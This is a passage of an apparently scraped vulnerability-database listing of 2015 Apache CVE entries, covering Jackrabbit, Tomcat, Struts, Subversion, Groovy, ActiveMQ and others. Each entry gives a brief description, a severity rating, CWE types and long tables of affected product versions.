apache derby 10.1.3.1
apache derby 10.4.2.0
apache derby 10.8.2.2
apache derby 10.8.1.2
apache derby 10.4.1.3
apache derby 10.6.2.1
apache derby 10.3.3.0
apache derby 10.5.3.0
apache derby 10.6.1.0
apache derby 10.9.1.0
apache derby 10.10.1.1
CVE-2015-1833 MEDIUM

XML external entity (XXE) vulnerability in Apache Jackrabbit before 2.0.6, 2.2.x before 2.2.14, 2.4.x before 2.4.6, 2.6.x before 2.6.6, 2.8.x before 2.8.1, and 2.10.x before 2.10.1 allows remote attackers to read arbitrary files and send requests to intranet servers via a crafted WebDAV request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache jackrabbit 2.2.8
apache jackrabbit 2.4.0
apache jackrabbit 2.6.5
apache jackrabbit 2.2.1
apache jackrabbit 2.2.11
apache jackrabbit 2.6.1
apache jackrabbit 2.2.12
apache jackrabbit 2.2.7
apache jackrabbit *
apache jackrabbit 2.2.10
apache jackrabbit 2.4.4
apache jackrabbit 2.6.3
apache jackrabbit 2.2.5
apache jackrabbit 2.4.2
apache jackrabbit 2.2.9
apache jackrabbit 2.2.0
apache jackrabbit 2.2.2
apache jackrabbit 2.10.0
apache jackrabbit 2.2.13
apache jackrabbit 2.6.0
apache jackrabbit 2.4.3
apache jackrabbit 2.6.2
apache jackrabbit 2.2.4
apache jackrabbit 2.8.0
apache jackrabbit 2.4.1
apache jackrabbit 2.6.4
apache jackrabbit 2.4.5
CVE-2015-1835 LOW

Apache Cordova Android before 3.7.2 and 4.x before 4.0.2, when an application does not set explicit values in config.xml, allows remote attackers to modify undefined secondary configuration variables (preferences) via a crafted intent: URL.

CVSS 2.0

Severity: LOW

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache cordova 4.0.0
apache cordova 4.0.1
apache cordova *
CVE-2015-1836 HIGH

Apache HBase 0.98 before 0.98.12.1, 1.0 before 1.0.1.1, and 1.1 before 1.1.0.1, as used in IBM InfoSphere BigInsights 3.0, 3.0.0.1, and 3.0.0.2 and other products, uses incorrect ACLs for ZooKeeper coordination state, which allows remote attackers to cause a denial of service (daemon outage), obtain sensitive information, or modify data via unspecified client traffic.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache hbase 0.98.1
apache hbase 0.98.3
apache hbase 0.98.6.1
apache hbase 0.98.9
ibm infosphere_biginsights 3.0.0.2
ibm infosphere_biginsights 3.0.0.0
apache hbase 0.98.10.1
apache hbase 0.98.2
ibm infosphere_biginsights 3.0.0.1
apache hbase 0.98.0
apache hbase 0.98.11
apache hbase 0.98.6
apache hbase 0.98.7
apache hbase 0.98.5
apache hbase 0.98.10
apache hbase 0.98.4
apache hbase 0.98.8
apache hbase 0.98.12
CVE-2015-2091 MEDIUM

The authentication hook (mgs_hook_authz) in mod-gnutls 0.5.10 and earlier does not validate client certificates when "GnuTLSClientVerify require" is set, which allows remote attackers to spoof clients via a crafted certificate.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache mod-gnutls *
CVE-2015-2944 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in Apache Sling API before 2.2.2 and Apache Sling Servlets Post before 2.1.2 allow remote attackers to inject arbitrary web script or HTML via the URI, related to (1) org/apache/sling/api/servlets/HtmlResponse and (2) org/apache/sling/servlets/post/HtmlResponse.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache sling_api *
apache sling_servlets_post *
CVE-2015-2992 MEDIUM

Apache Struts before 2.3.20 has a cross-site scripting (XSS) vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache struts *
CVE-2015-3183 MEDIUM

The chunked transfer coding implementation in the Apache HTTP Server before 2.4.14 does not properly parse chunk headers, which allows remote attackers to conduct HTTP request smuggling attacks via a crafted request, related to mishandling of large chunk-size values and invalid chunk-extension characters in modules/http/http_filters.c.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-17,CWE-20,

Products Affected

Vendor Product Version
apache http_server *
CVE-2015-3184 MEDIUM

mod_authz_svn in Apache Subversion 1.7.x before 1.7.21 and 1.8.x before 1.8.14, when using Apache httpd 2.4.x, does not properly restrict anonymous access, which allows remote anonymous users to read hidden files via the path name.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache subversion 1.7.3
apple xcode *
apache subversion 1.7.18
apache subversion 1.8.2
apache subversion 1.8.11
apache subversion 1.7.14
apache subversion 1.8.4
apache subversion 1.8.9
apache subversion 1.8.0
apache subversion 1.8.8
apache subversion 1.7.8
apache subversion 1.8.1
apache subversion 1.8.10
apache subversion 1.8.13
apache subversion 1.7.11
apache subversion 1.7.6
apache subversion 1.7.9
apache subversion 1.7.13
apache subversion 1.7.19
apache subversion 1.7.4
apache subversion 1.7.16
apache subversion 1.7.1
apache subversion 1.8.5
apache subversion 1.8.6
apache subversion 1.8.3
apache subversion 1.7.10
apache subversion 1.7.5
apache subversion 1.7.20
apache subversion 1.7.12
apache subversion 1.7.17
apache subversion 1.7.15
apache subversion 1.8.7
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.7.7
CVE-2015-3185 MEDIUM

The ap_some_auth_required function in server/request.c in the Apache HTTP Server 2.4.x before 2.4.14 does not consider that a Require directive may be associated with an authorization setting rather than an authentication setting, which allows remote attackers to bypass intended access restrictions in opportunistic circumstances by leveraging the presence of a module that relies on the 2.2 API behavior.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache http_server 2.4.7
apache http_server 2.4.0
canonical ubuntu_linux 15.04
apache http_server 2.4.13
apache http_server 2.4.2
apache http_server 2.4.6
apple xcode 7.0
apache http_server 2.4.12
apache http_server 2.4.4
apache http_server 2.4.3
apache http_server 2.4.10
canonical ubuntu_linux 12.04
apache http_server 2.4.1
apple mac_os_x 10.10.4
apache http_server 2.4.8
canonical ubuntu_linux 14.04
apache http_server 2.4.9
apple mac_os_x_server 5.0.3
CVE-2015-3186 LOW

Cross-site scripting (XSS) vulnerability in Apache Ambari before 2.1.0 allows remote authenticated cluster operator users to inject arbitrary web script or HTML via the note field in a configuration change.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ambari 1.7.0
apache ambari *
apache ambari 2.0.1
apache ambari 2.0.0
CVE-2015-3187 MEDIUM

The svn_repos_trace_node_locations function in Apache Subversion before 1.7.21 and 1.8.x before 1.8.14, when path-based authorization is used, allows remote authenticated users to obtain sensitive path information by reading the history of a node that has been moved from a hidden path.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apple xcode *
apache subversion 1.8.5
apache subversion 1.8.6
apache subversion 1.8.2
apache subversion 1.8.11
apache subversion *
apache subversion 1.8.3
apache subversion 1.8.4
apache subversion 1.8.9
apache subversion 1.8.8
apache subversion 1.8.1
apache subversion 1.8.10
apache subversion 1.8.13
apache subversion 1.8.7
CVE-2015-3188 HIGH

The UI daemon in Apache Storm 0.10.0 before 0.10.0-beta1 allows remote attackers to execute arbitrary code via unspecified vectors.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache storm 0.10.0
CVE-2015-3249 HIGH

The HTTP/2 experimental feature in Apache Traffic Server 5.3.x before 5.3.1 allows remote attackers to cause a denial of service (out-of-bounds access and daemon crash) or possibly execute arbitrary code via vectors related to the (1) frame_handlers array or (2) set_dynamic_table_size function.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache traffic_server 5.3.0
CVE-2015-3250 MEDIUM

Apache Directory LDAP API before 1.0.0-M31 allows attackers to conduct timing attacks via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache directory_ldap_api *
CVE-2015-3251 MEDIUM

Apache CloudStack before 4.5.2 might allow remote authenticated administrators to obtain sensitive password information for root accounts of virtual machines via unspecified vectors related to API calls.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache cloudstack 4.4.4
apache cloudstack 4.5.1
CVE-2015-3252 MEDIUM

Apache CloudStack before 4.5.2 does not properly preserve VNC passwords when migrating KVM virtual machines, which allows remote attackers to gain access by connecting to the VNC server.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-255,

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2015-3253 HIGH

The MethodClosure class in runtime/MethodClosure.java in Apache Groovy 1.7.0 through 2.4.3 allows remote attackers to execute arbitrary code or cause a denial of service via a crafted serialized object.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache groovy 2.1.3
apache groovy 2.1.0
apache groovy 2.3.7
apache groovy 2.4.3
apache groovy 2.1.4
apache groovy 1.8.5
oracle retail_order_broker_cloud_service 5.1
apache groovy 2.0.0
apache groovy 2.1.7
apache groovy 1.8.7
apache groovy 1.7.6
apache groovy 2.3.10
apache groovy 1.7.4
apache groovy 2.0.4
apache groovy 1.9.0
oracle retail_store_inventory_management 13.2
apache groovy 1.8.3
oracle retail_order_broker_cloud_service 15.0
oracle webcenter_sites 12.2.1
oracle health_sciences_clinical_development_center 3.1.2
apache groovy 1.7.3
apache groovy 2.3.11
oracle retail_order_broker_cloud_service 5.2
apache groovy 1.7.8
apache groovy 2.3.1
apache groovy 2.0.7
oracle retail_store_inventory_management 14.1
apache groovy 2.0.5
apache groovy 2.1.2
apache groovy 2.3.0
apache groovy 1.8.6
apache groovy 1.8.1
apache groovy 2.0.8
apache groovy 2.4.2
apache groovy 1.7.11
apache groovy 2.3.4
apache groovy 2.3.3
apache groovy 2.3.2
apache groovy 1.7.5
apache groovy 2.0.6
oracle retail_service_backbone 13.0
apache groovy 2.0.1
apache groovy 2.1.9
oracle retail_service_backbone 15.0
apache groovy 2.3.8
apache groovy 2.0.2
apache groovy 1.8.9
apache groovy 2.2.1
oracle retail_service_backbone 13.2
apache groovy 2.2.0
apache groovy 1.7.1
oracle retail_store_inventory_management 14.0
oracle retail_service_backbone 13.1
apache groovy 1.8.2
apache groovy 2.1.6
apache groovy 2.1.8
apache groovy 1.8.8
apache groovy 1.7.2
apache groovy 2.2.2
oracle retail_service_backbone 14.0
apache groovy 1.7.9
apache groovy 1.8.4
oracle retail_order_broker_cloud_service 4.1
apache groovy 2.1.1
oracle webcenter_sites 11.1.1.8.0
apache groovy 2.3.9
oracle retail_service_backbone 14.1
oracle health_sciences_clinical_development_center 3.1.1
apache groovy 1.7.7
apache groovy 1.7.0
apache groovy 2.3.6
apache groovy 2.4.1
apache groovy 1.8.0
apache groovy 2.0.3
apache groovy 2.3.5
apache groovy 2.4.0
apache groovy 1.7.10
apache groovy 2.1.5
CVE-2015-3254 MEDIUM

The client libraries in Apache Thrift before 0.9.3 might allow remote authenticated users to cause a denial of service (infinite recursion) via vectors involving the skip function.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache thrift *
CVE-2015-3268 MEDIUM

Cross-site scripting (XSS) vulnerability in the DisplayEntityField.getDescription method in ModelFormField.java in Apache OFBiz before 12.04.06 and 13.07.x before 13.07.03 allows remote attackers to inject arbitrary web script or HTML via the description attribute of a display-entity element.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ofbiz 12.04.04
apache ofbiz 13.07.02
apache ofbiz 12.04.03
apache ofbiz 12.04.02
apache ofbiz 12.04.01
apache ofbiz 12.04.05
apache ofbiz 13.07.01
CVE-2015-3270 MEDIUM

Apache Ambari before 2.0.2 or 2.1.x before 2.1.1 allows remote authenticated users to gain administrative privileges via unspecified vectors, possibly related to changing passwords.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache ambari 1.7.0
apache ambari 2.0.1
apache ambari 2.0.0
apache ambari 2.1.0
CVE-2015-3271 MEDIUM

Apache Tika server (aka tika-server) in Apache Tika 1.9 might allow remote attackers to read arbitrary files via the HTTP fileUrl header.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tika 1.9
CVE-2015-4551 MEDIUM

LibreOffice before 4.4.5 and Apache OpenOffice before 4.1.2 uses the stored LinkUpdateMode configuration information in OpenDocument Format files and templates when handling links, which might allow remote attackers to obtain sensitive information via a crafted document, which embeds data from local files into (1) Calc or (2) Writer.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
apache openoffice *
canonical ubuntu_linux 15.04
canonical ubuntu_linux 14.04
debian debian_linux 7.0
libreoffice libreoffice *
debian debian_linux 8.0
CVE-2015-4928 MEDIUM

Apache Ambari before 2.1, as used in IBM Infosphere BigInsights 4.x before 4.1, includes cleartext passwords on a Configs screen, which allows physically proximate attackers to obtain sensitive information by reading password fields.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache ambari *
CVE-2015-4940 LOW

Apache Ambari before 2.1, as used in IBM Infosphere BigInsights 4.x before 4.1, stores a cleartext BigSheets password in a configuration file, which allows local users to obtain sensitive information by reading this file.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache ambari *
CVE-2015-5167 MEDIUM

The Policy Admin Tool in Apache Ranger before 0.5.1 allows remote authenticated users to bypass intended access restrictions via the REST API.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache ranger *
CVE-2015-5168 HIGH

Unspecified vulnerability in the HTTP/2 experimental feature in Apache Traffic Server 5.3.x before 5.3.2 has unknown impact and attack vectors, a different vulnerability than CVE-2015-5206.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache traffic_server 5.3.1
apache traffic_server 5.3.0
CVE-2015-5169 MEDIUM

Cross-site scripting (XSS) vulnerability in Apache Struts before 2.3.20.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache struts *
CVE-2015-5174 MEDIUM

Directory traversal vulnerability in RequestUtil.java in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.65, and 8.x before 8.0.27 allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application in a getResource, getResourceAsStream, or getResourcePaths call, as demonstrated by the $CATALINA_BASE/webapps directory.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.0
apache tomcat 8.0.20
apache tomcat 7.0.39
apache tomcat 8.0.22
apache tomcat 7.0.56
apache tomcat 8.0.14
apache tomcat 6.0.43
apache tomcat 6.0.1
apache tomcat 7.0.12
apache tomcat 8.0.11
apache tomcat 6.0.29
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 6.0.37
apache tomcat 7.0.28
apache tomcat 7.0.62
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 8.0.23
apache tomcat 6.0.44
apache tomcat 6.0.36
apache tomcat 6.0.32
apache tomcat 7.0.40
debian debian_linux 8.0
apache tomcat 6.0.4
apache tomcat 6.0.2
canonical ubuntu_linux 16.04
apache tomcat 7.0.59
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 7.0.57
apache tomcat 6.0.33
apache tomcat 8.0.21
apache tomcat 7.0.37
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 8.0.17
canonical ubuntu_linux 15.10
apache tomcat 7.0.35
apache tomcat 7.0.64
apache tomcat 6.0.13
apache tomcat 7.0.23
apache tomcat 7.0.19
canonical ubuntu_linux 12.04
apache tomcat 7.0.61
apache tomcat 6.0.39
apache tomcat 8.0.15
apache tomcat 7.0.29
canonical ubuntu_linux 14.04
apache tomcat 6.0.26
apache tomcat 8.0.26
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 8.0.24
apache tomcat 6.0.30
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
debian debian_linux 7.0
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 7.0.27
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 7.0.52
apache tomcat 6.0.24
apache tomcat 7.0.63
apache tomcat 7.0.53
apache tomcat 7.0.22
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.35
apache tomcat 6.0.41
apache tomcat 8.0.18
CVE-2015-5175 MEDIUM

Application plugins in Apache CXF Fediz before 1.1.3 and 1.2.x before 1.2.1 allow remote attackers to cause a denial of service.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache cxf_fediz *
apache cxf_fediz 1.2.0
CVE-2015-5204 MEDIUM

CRLF injection vulnerability in the Apache Cordova File Transfer Plugin (cordova-plugin-file-transfer) for Android before 1.3.0 allows remote attackers to inject arbitrary headers via CRLF sequences in the filename of an uploaded file.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache cordova_file_transfer *
CVE-2015-5206 HIGH

Unspecified vulnerability in the HTTP/2 experimental feature in Apache Traffic Server before 5.3.x before 5.3.2 has unknown impact and attack vectors, a different vulnerability than CVE-2015-5168.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache traffic_server 5.3.1
apache traffic_server 5.3.0
CVE-2015-5207 HIGH

Apache Cordova iOS before 4.0.0 might allow attackers to bypass a URL whitelist protection mechanism in an app and load arbitrary resources by leveraging unspecified methods.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-254,CWE-284,

Products Affected

Vendor Product Version
apache cordova *
CVE-2015-5208 MEDIUM

Apache Cordova iOS before 4.0.0 allows remote attackers to execute arbitrary plugins via a link.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache cordova *
CVE-2015-5209 MEDIUM

Apache Struts 2.x before 2.3.24.1 allows remote attackers to manipulate Struts internals, alter user sessions, or affect container settings via vectors involving a top object.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.3.20
apache struts 2.0.9
apache struts 2.3.17
apache struts 2.3.14.1
apache struts 2.3.11
apache struts 2.3.16.2
apache struts 2.3.10
apache struts 2.1.5
apache struts 2.2.3.1
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.3
apache struts 2.3.15.2
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.3.16.1
apache struts 2.0.12
apache struts 2.3.16.3
apache struts 2.0.14
apache struts 2.0.0
apache struts 2.3.15.1
apache struts 2.3.23
apache struts 2.3.13
apache struts 2.3.4.1
apache struts 2.3.3
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.0.8
apache struts 2.3.4
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.3.22
apache struts 2.3.6
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.3.19
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.3.9
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.3.5
apache struts 2.3.1.2
apache struts 2.2.3
apache struts 2.3.21
apache struts 2.3.20.2
apache struts 2.3.16
CVE-2015-5210 MEDIUM

Open redirect vulnerability in Apache Ambari before 2.1.2 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the targetURI parameter.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache ambari 1.7.0
apache ambari *
apache ambari 2.0.1
apache ambari 2.0.2
apache ambari 2.0.0
apache ambari 2.1.0
CVE-2015-5212 MEDIUM

Integer underflow in LibreOffice before 4.4.5 and Apache OpenOffice before 4.1.2, when the configuration setting "Load printer settings with the document" is enabled, allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via crafted PrinterSetup data in an ODF document.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-191,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
apache openoffice *
canonical ubuntu_linux 15.04
canonical ubuntu_linux 14.04
debian debian_linux 7.0
libreoffice libreoffice *
debian debian_linux 8.0
CVE-2015-5213 MEDIUM

Integer overflow in LibreOffice before 4.4.5 and Apache OpenOffice before 4.1.2 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via a long DOC file, which triggers a buffer overflow.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-189,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
apache openoffice *
canonical ubuntu_linux 15.04
canonical ubuntu_linux 14.04
debian debian_linux 7.0
libreoffice libreoffice *
debian debian_linux 8.0
CVE-2015-5214 MEDIUM

LibreOffice before 4.4.6 and 5.x before 5.0.1 and Apache OpenOffice before 4.1.2 allows remote attackers to cause a denial of service (memory corruption and application crash) or execute arbitrary code via an index to a non-existent bookmark in a DOC file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
apache openoffice *
canonical ubuntu_linux 15.04
canonical ubuntu_linux 14.04
debian debian_linux 7.0
libreoffice libreoffice *
debian debian_linux 8.0
CVE-2015-5241 MEDIUM

After logging into the portal, the logout jsp page redirects the browser back to the login page after. It is feasible for malicious users to redirect the browser to an unintended web page in Apache jUDDI 3.1.2, 3.1.3, 3.1.4, and 3.1.5 when utilizing the portlets based user interface also known as 'Pluto', 'jUDDI Portal', 'UDDI Portal' or 'uddi-console'. User session data, credentials, and auth tokens are cleared before the redirect.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-601,

Products Affected

Vendor Product Version
apache juddi 3.1.2
apache juddi 3.1.5
apache juddi 3.1.4
apache juddi 3.1.3
CVE-2015-5253 MEDIUM

The SAML Web SSO module in Apache CXF before 2.7.18, 3.0.x before 3.0.7, and 3.1.x before 3.1.3 allows remote authenticated users to bypass authentication via a crafted SAML response with a valid signed assertion, related to a "wrapping attack."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache cxf *
CVE-2015-5254 HIGH

Apache ActiveMQ 5.x before 5.13.0 does not restrict the classes that can be serialized in the broker, which allows remote attackers to execute arbitrary code via a crafted serialized Java Message Service (JMS) ObjectMessage object.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache activemq 5.6.0
apache activemq 5.3.1
apache activemq 5.11.1
redhat openshift 2.0
apache activemq 5.8.0
apache activemq 5.9.0
apache activemq 5.12.1
apache activemq 5.4.0
apache activemq 5.4.3
apache activemq 5.1.0
apache activemq 5.3.0
apache activemq 5.0.0
apache activemq 5.10.0
apache activemq 5.10.1
fedoraproject fedora 22
apache activemq 5.7.0
apache activemq 5.11.2
apache activemq 5.4.1
apache activemq 5.10.2
apache activemq 5.9.1
apache activemq 5.11.0
fedoraproject fedora 23
apache activemq 5.5.0
apache activemq 5.12.0
apache activemq 5.3.2
apache activemq 5.5.1
apache activemq 5.2.0
CVE-2015-5256 MEDIUM

Apache Cordova-Android before 4.1.0, when an application relies on a remote server, improperly implements a JavaScript whitelist protection mechanism, which allows attackers to bypass intended access restrictions via a crafted URI.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache cordova *
CVE-2015-5259 HIGH

Integer overflow in the read_string function in libsvn_ra_svn/marshal.c in Apache Subversion 1.9.x before 1.9.3 allows remote attackers to execute arbitrary code via an svn:// protocol string, which triggers a heap-based buffer overflow and an out-of-bounds read.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-119,CWE-189,

Products Affected

Vendor Product Version
apache subversion 1.9.1
apache subversion 1.9.2
apache subversion 1.9.0
CVE-2015-5262 MEDIUM

http/conn/ssl/SSLConnectionSocketFactory.java in Apache HttpComponents HttpClient before 4.3.6 ignores the http.socket.timeout configuration setting during an SSL handshake, which allows remote attackers to cause a denial of service (HTTPS call hang) via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
fedoraproject fedora 23
canonical ubuntu_linux 15.04
canonical ubuntu_linux 14.04
apache httpclient *
fedoraproject fedora 21
fedoraproject fedora 22
CVE-2015-5343 HIGH

Integer overflow in util.c in mod_dav_svn in Apache Subversion 1.7.x, 1.8.x before 1.8.15, and 1.9.x before 1.9.3 allows remote authenticated users to cause a denial of service (subversion server crash or memory consumption) and possibly execute arbitrary code via a skel-encoded request body, which triggers an out-of-bounds read and heap-based buffer overflow.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache subversion *
debian debian_linux 8.0
CVE-2015-5344 HIGH

The camel-xstream component in Apache Camel before 2.15.5 and 2.16.x before 2.16.1 allow remote attackers to execute arbitrary commands via a crafted serialized Java object in an HTTP request.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-19,

Products Affected

Vendor Product Version
apache camel *
apache camel 2.16.0
CVE-2015-5345 MEDIUM

The Mapper component in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.30, and 9.x before 9.0.0.M2 processes redirects before considering security constraints and Filters, which allows remote attackers to determine the existence of a directory via a URL that lacks a trailing / (slash) character.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.0.0
apache tomcat 8.0.20
apache tomcat 7.0.39
apache tomcat 8.0.22
apache tomcat 7.0.56
apache tomcat 8.0.14
apache tomcat 6.0.43
apache tomcat 6.0.1
apache tomcat 7.0.12
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 6.0.29
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 6.0.37
apache tomcat 7.0.28
apache tomcat 7.0.62
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 8.0.23
apache tomcat 6.0.44
apache tomcat 6.0.36
apache tomcat 6.0.32
apache tomcat 7.0.40
debian debian_linux 8.0
apache tomcat 6.0.4
apache tomcat 6.0.2
canonical ubuntu_linux 16.04
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 9.0.0
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 7.0.57
apache tomcat 6.0.33
apache tomcat 8.0.21
apache tomcat 7.0.37
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 8.0.17
canonical ubuntu_linux 15.10
apache tomcat 7.0.35
apache tomcat 7.0.64
apache tomcat 6.0.13
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
canonical ubuntu_linux 12.04
apache tomcat 7.0.61
apache tomcat 6.0.39
apache tomcat 8.0.15
apache tomcat 7.0.29
canonical ubuntu_linux 14.04
apache tomcat 6.0.26
apache tomcat 8.0.26
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 8.0.24
apache tomcat 6.0.30
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
debian debian_linux 7.0
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 7.0.27
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 8.0.28
apache tomcat 7.0.52
apache tomcat 6.0.24
apache tomcat 7.0.63
apache tomcat 7.0.53
apache tomcat 7.0.22
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.35
apache tomcat 6.0.41
apache tomcat 8.0.18
CVE-2015-5346 MEDIUM

Session fixation vulnerability in Apache Tomcat 7.x before 7.0.66, 8.x before 8.0.30, and 9.x before 9.0.0.M2, when different session settings are used for deployments of multiple versions of the same web application, might allow remote attackers to hijack web sessions by leveraging use of a requestedSessionSSL field for an unintended request, related to CoyoteAdapter.java and Request.java.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.0.0
apache tomcat 8.0.20
apache tomcat 7.0.39
apache tomcat 8.0.22
apache tomcat 7.0.56
